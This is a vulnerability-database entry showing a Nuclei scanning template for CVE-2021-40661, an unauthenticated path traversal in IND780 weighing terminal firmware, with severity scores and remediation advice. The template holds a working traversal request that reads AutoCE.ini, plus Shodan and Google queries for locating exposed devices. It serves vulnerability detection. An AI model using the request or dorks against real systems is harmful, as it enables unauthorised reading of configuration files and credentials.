Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-40661
HistoryNov 02, 2022 - 3:05 p.m.

IND780 - Local File Inclusion

2022-11-0215:05:10
ProjectDiscovery
github.com
12
cve2021
ind780
local file inclusion
mt
vulnerability
firmware
configuration files
remote attacker
unauthenticated access

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.019

Percentile

88.7%

IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system.
id: CVE-2021-40661

info:
  name: IND780 - Local File Inclusion
  author: For3stCo1d
  severity: high
  description: |
    IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the system.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate the vulnerability and ensure that the device is not accessible from untrusted networks.
  reference:
    - https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
    - https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40661
    - https://github.com/Live-Hack-CVE/CVE-2021-40661
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-40661
    cwe-id: CWE-22
    epss-score: 0.01137
    epss-percentile: 0.84411
    cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mt
    product: ind780_firmware
    shodan-query:
      - IND780
      - ind780
    google-query: inurl:excalweb.dll
  tags: cve2021,cve,ind780,lfi,mt

http:
  - method: GET
    path:
      - "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ExePath=\Windows'
          - 'WorkDir=\Windows'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fbb87b3a6a8b27233038f63ce9a4ceb74d10c0a0903f075772be95739f992293022100dd475608f0d3e6699a90d7a44bbc87a4ab08c3fa3b53cccb5f9e47e1ec267771:922c64590222798bb761d5b6d8e72950

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.019

Percentile

88.7%

Related for NUCLEI:CVE-2021-40661